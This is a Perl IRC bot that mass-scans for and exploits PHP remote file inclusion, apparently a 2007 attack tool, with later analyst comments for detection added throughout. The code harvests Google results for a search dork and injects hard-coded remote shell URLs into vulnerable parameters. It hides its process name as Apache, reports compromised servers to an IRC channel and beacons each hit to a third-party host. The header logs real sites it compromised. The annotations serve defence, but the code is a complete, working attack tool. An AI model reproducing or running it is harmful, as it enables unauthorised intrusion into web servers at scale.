################################################################################################################################################# # # RFi Scanner 2007 by Morgan.. # # <@Morgan> !scan page.php?id= "Powered by RGameScript" # <NewScan_Google> [Scan] Started: page.php?id= - Dork: "Powered by RGameScript" Engine: Google # <NewScan_Google> [Scan] Google Found: 1656 Sites! # <NewScan_Google> [Scan] Cleaned results: 36 Sites! # <NewScan_Google> [Scan] Exploting started! # <NewScan_Google> [SafeON] [Sys Linux] [Free 36.55 GB ] http://gry.nakazdytemat.pl/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg? # <NewScan_Google> [Information] Linux blackhawk.avx.pl 2.6.19.2 #4 SMP Fri Feb 2 11:51:02 CET 2007 i686 # <NewScan_Google> [SafeOFF] [Sys Linux] [Free 26.26 GB ] http://allgamesallfree.org/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg? # <NewScan_Google> [Information] Linux games.allgamesallfree.com 2.6.9-55.0.2.ELsmp #1 SMP Tue Jun 26 14:30:58 EDT 2007 i686 # <NewScan_Google> [Scan] Scan Finished "Powered by RGameScript" # # # Enjoy! 
# /Morgan
#
# irc.realworm.net - #Morgan
#################################################################################################################################################
#
# NOTE(review): analyst annotations for triage and detection. The statements
# are unchanged; only line breaks, indentation and comments were restored,
# because this copy of the file had been collapsed onto a few long lines.
#
# What the code below does, as far as this file shows:
#   * forks into the background and overwrites $0 with an Apache-looking
#     command line, so the process does not present itself as a Perl script;
#   * connects to a hard-coded IRC server, joins a channel and reads it;
#   * treats any channel line matching "!scan <bug> <dork>" as a command. No
#     check of who sent the line is visible anywhere in this file;
#   * fetches Google result pages for <dork>, builds one URL per result from
#     host + <bug> + a hard-coded remote URL, requests it, and reports to the
#     channel the hosts whose response contains the marker 31337;
#   * for each reported host, additionally contacts a second hard-coded host
#     (see checksafemode) whose response is never used.
#
# Detection notes grounded in this file:
#   * outbound TCP to the IRC server/port in the configuration block, with
#     the fixed NICK/USER strings printed below;
#   * outbound HTTP/1.0 requests with "User-Agent: Mozilla/5.0" and
#     "Accept: */*" built by hand in query() and checksafemode();
#   * on the receiving web servers: request parameters whose value is itself
#     an http:// URL ending in "?".
# The hosts named in the string literals may themselves be third-party sites
# that were abused - confirm before attributing.
#
# Mitigation on the application side: request parameters should never reach
# include/require, and PHP's allow_url_include should stay disabled.

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###############CONFIGURATION###################
# Name written into $0 after the fork (process-name masquerade).
my $processo = "/usr/local/apache/bin/nscan -DSSL";
my $printcmd="http://www.animedinasty.org/cmd/info.jpg?"; #<---- Change this for your CMD
# IRC endpoint, nickname and channel used for command and reporting traffic.
my $server="irc.x-reaction.net";
my $porta="6667";
my $nick="x____H264____x";
my $chan="#a";
###############END OF CONFIGURATION############

# $verbot is assigned here and not read again in this file.
my $verbot = "2.0";
# Remote URL appended to every probe request. NOTE(review): it is hard-coded
# and marked as not to be changed, so every probe references this one host
# regardless of who runs the script - presumably deliberate; confirm.
my $cmd="http://www.greenkorea.ph/bbs/data/_metal/safe.txt?"; #Never change this

# Detach from the launching shell: the parent exits, the child carries on.
my $pid=fork;
exit if $pid;
# Replace the visible process name, padded with 16 NUL bytes.
$0="$processo"."\0"x16;

# Single long-lived TCP connection to the IRC server; the script dies if it
# cannot be opened.
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
# IRC registration and channel join. These literal strings are stable
# signatures for network detection.
# NOTE(review): the digit runs such as "3,1" and "9" inside the PRIVMSG texts
# look like mIRC colour codes whose control byte was lost in this copy -
# TODO confirm against an original sample.
print $sk "NICK $nick\r\n";
print $sk "USER Google 8 * : Google : google@google.it : Google :Google\r\n";
print $sk "JOIN $chan\r\n";
print $sk "PRIVMSG $chan :3,1[9S3,1can-Bot] Scan is 3ON1 : 9!scan <bug> <dork>\r\n";

# Main loop: one iteration per line received from the IRC server.
while($line = <$sk>){
    $line =~ s/\r\n$//;
    # Keep-alive: reply to the server's PING (also echoed to STDOUT).
    if ($line=~ /^PING \:(.*)/) {
        print "PONG :$1";
        print $sk "PONG :$1";
    }
    # Channel line "<any char>deletebot" makes the bot send QUIT. The "." is
    # an unescaped regex wildcard, and the sender is not checked.
    if ($line=~ /PRIVMSG $chan :.deletebot/){
        stampa($sk, "QUIT");
    }
    # Channel line "!scan <bug> <dork>": $1 is the first whitespace-delimited
    # word, $2 the rest of the line. The sender is not checked here either.
    if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){
        # Double fork: the first child exits at once and is reaped by
        # waitpid, the grandchild runs the scan, so this loop keeps reading
        # IRC while a scan is in progress.
        if (my $pid = fork) {
            waitpid($pid, 0);
        }
        else {
            if (fork) {
                exit;
            }
            else {
                my $bug=$1;
                my $dork=$2;
                my $contatore=0;
                my ($type,$space);
                # Per-scan count of hosts already reported, so each host is
                # announced once.
                my %hosts;
                stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Started:9 $bug 3 Dork:9 $dork 3Engine:9 Google ");
                my @glist=&google($dork);
                stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Google Found:9 ".scalar(@glist)."3 Sites!");
                push(my @tot, @glist);
                # Order-preserving de-duplication of the candidate list.
                my @puliti=&unici(@tot);
                stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Cleaned results: 9 ".scalar(@puliti)."3 Sites!");
                # The next string literal contains a line break in this copy;
                # it is kept exactly as found, so its continuation line must
                # stay unindented.
                stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Exploting started! 
");
                my $uni=scalar(@puliti);
                foreach my $sito (@puliti) {
                    $contatore++;
                    # Empty branch; it has no effect.
                    if ($contatore %30==0){ }
                    # The "finished" message is sent when the counter reaches
                    # the total minus one.
                    if ($contatore==$uni-1){
                        stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Scan Finished9 $dork");
                    }
                    # Probe URL: candidate + <bug> + hard-coded remote URL.
                    # This is the request shape a targeted web server logs.
                    my $test="http://".$sito.$bug.$cmd."?";
                    # Same shape with the configurable remote URL; used for
                    # the channel report and for checksafemode().
                    my $print="http://".$sito.$bug.$printcmd."?";
                    # $vuln is assigned but not read again in this file.
                    my $vuln="http://".$sito.$bug."";
                    my $req=HTTP::Request->new(GET=>$test);
                    my $ua=LWP::UserAgent->new();
                    $ua->timeout(5);
                    my $response=$ua->request($req);
                    if ($response->is_success) {
                        my $re=$response->content;
                        # A response containing both "31337" and "uid=" is
                        # reported under the label the author writes as
                        # "SafeOFF".
                        if($re =~ /31337/ && $re =~ /uid=/){
                            my $hs=geths($print);
                            $hosts{$hs}++;
                            # Only the first hit per host is announced.
                            if($hosts{$hs}=="1"){
                                # os() returns "type,space,kernel"; $x and
                                # $ker are not declared with my.
                                $x=os($test);
                                ($type,$space,$ker)=split(/\,/,$x);
                                stampa($sk, "PRIVMSG $chan :3,1[9S3afe9OFF3] 3,1[9S3ys9 ".$type."3] 3,1[9F3ree9 ".$space." 9] $print ");
                                stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]9 $ker ");
                                checksafemode("$print");
                            }
                        }
                        # "31337" without "uid=" is reported under the label
                        # "SafeON".
                        elsif($re =~ /31337/) {
                            my $hs=geths($print);
                            $hosts{$hs}++;
                            if($hosts{$hs}=="1"){
                                $x=os($test);
                                ($type,$space,$ker)=split(/\,/,$x);
                                # This literal also contains a line break in
                                # this copy and is kept exactly as found.
                                stampa($sk, "PRIVMSG $chan :3,1[9S3afe14ON3] 3,1[9S3ys14 ".$type."3] 3,1[9F3ree14 ".$space." 
3]14 $print ");
                                stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]14 $ker ");
                                checksafemode("$print");
                            }
                        }
                    }
                }
            }
            # The scanning grandchild ends here instead of falling back into
            # the IRC read loop.
            exit;
        }
    }
}

# Write one line of text to a socket.
# With two arguments: (handle, text). With any other count: text is $_[0] and
# the handle is the file-scoped $sk.
sub stampa() {
    if ($#_ == '1') {
        my $sk = $_[0];
        print $sk "$_[1]\n";
    }
    else {
        print $sk "$_[0]\n";
    }
}

# Fetch a URL through query() and extract three <br>-delimited fields from the
# response: OSTYPE:, Kernel: and Free:. Each loop keeps the last match.
# Returns them joined as "type,space,kernel".
sub os(){
    my $sito=$_[0];
    my $Res=query($sito);
    my $type;
    my $space;
    my $ker;
    my $str;
    while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){ $type=$1; }
    while($Res=~m/<br>Kernel:(.+?)\<br>/g){ $ker=$1; }
    while($Res=~m/<br>Free:(.+?)\<br>/g){ $space=$1; }
    $str=$type.",".$space.",".$ker;
    return $str;
}

# Collect candidate sites for a search term.
# Requests Google result pages at start=0,100,...,1000 (num=100) through
# query(), takes every `<a href="http://...` target that does not contain
# "google", and expands each into the three variants produced by links().
# Returns the flat list, duplicates included. Uses the package variable $b as
# the loop counter.
sub google(){
    my @lst;
    my $key = $_[0];
    for($b=0;$b<=1000;$b+=100){
        my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
        my $Res=query($Go);
        while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
            if ($1 !~ /google/){
                my $k=$1;
                my @grep=links($k);
                push(@lst,@grep);
            }
        }
    }
    return @lst;
}

# Expand one "host/path" string into three candidates: the string itself, the
# host part only, and the string with its last path segment removed. Each gets
# a trailing "/" and has "//" collapsed to "/".
sub links() {
    my @l;
    my $link=$_[0];
    my $host=$_[0];
    my $hdir=$_[0];
    $hdir=~s/(.*)\/[^\/]*$/\1/;
    $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $host.="/";
    $link.="/";
    $hdir.="/";
    $host=~s/\/\//\//g;
    $hdir=~s/\/\//\//g;
    $link=~s/\/\//\//g;
    push(@l,$link,$host,$hdir);
    return @l;
}

# Strip everything from the first "/" that follows a run of host characters,
# leaving the text up to and including that run. Used as the key for the
# per-host "already reported" count.
sub geths(){
    my $host=$_[0];
    $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    return $host;
}

# Encode a search term for the query string: space becomes "+", and the
# characters : / & " , \ become their percent-encoded forms. Nothing else is
# encoded.
sub key(){
    my $chiave=$_[0];
    $chiave =~ s/ /\+/g;
    $chiave =~ s/:/\%3A/g;
    $chiave =~ s/\//\%2F/g;
    $chiave =~ s/&/\%26/g;
    $chiave =~ s/\"/\%22/g;
    $chiave =~ s/,/\%2C/g;
    $chiave =~ s/\\/\%5C/g;
    return $chiave;
}

# Hand-built HTTP/1.0 GET over a plain TCP socket to port 80.
# Splits the URL into host and request path, sends a fixed header set, and
# returns every received line (status line and headers included) joined with
# spaces. Returns "" when the connection fails; any error inside the eval is
# swallowed. The fixed header set is a usable network signature.
sub query($){
    my $url=$_[0];
    $url=~s/http:\/\///;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host=~s/href=\"?http:\/\///;
    $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query=~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
        print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
        my @r = <$sock>;
        $page="@r";
        close($sock);
    };
    return $page;
}

# Send a request to a hard-coded host and path, passing a value derived from
# the reported URL in the "url" parameter.
# The response is read into $page, which is neither returned nor used, so the
# only observable effect is the outbound request itself.
# NOTE(review): this looks like reporting each finding to a party other than
# the IRC channel - confirm. The host and path are a fixed network indicator
# independent of the configuration block.
sub checksafemode($){
    my $url=$_[0];
    $url=~s/http:\/\///;
    my $host=$url;
    my $query=$url;
    my $page="";
    $query=~s/$host//;
    if ($query eq "")
    {$query="/";};
    eval {
        my $sock = IO::Socket::INET->new(PeerAddr=>"tckct.co.uk",PeerPort=>"80",Proto=>"tcp") or return;
        print $sock "GET /logfiles/CDPW3U1032/safe.php?url=$query HTTP/1.0\r\nHost: tckct.co.uk\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
        my @r = <$sock>;
        $page="@r";
        close($sock);
    };
}

# Return the arguments with duplicates removed, keeping first-seen order.
sub unici{
    my @unici = ();
    my %visti = ();
    foreach my $elemento ( @_ ) {
        next if $visti{ $elemento }++;
        push @unici, $elemento;
    }
    return @unici;
}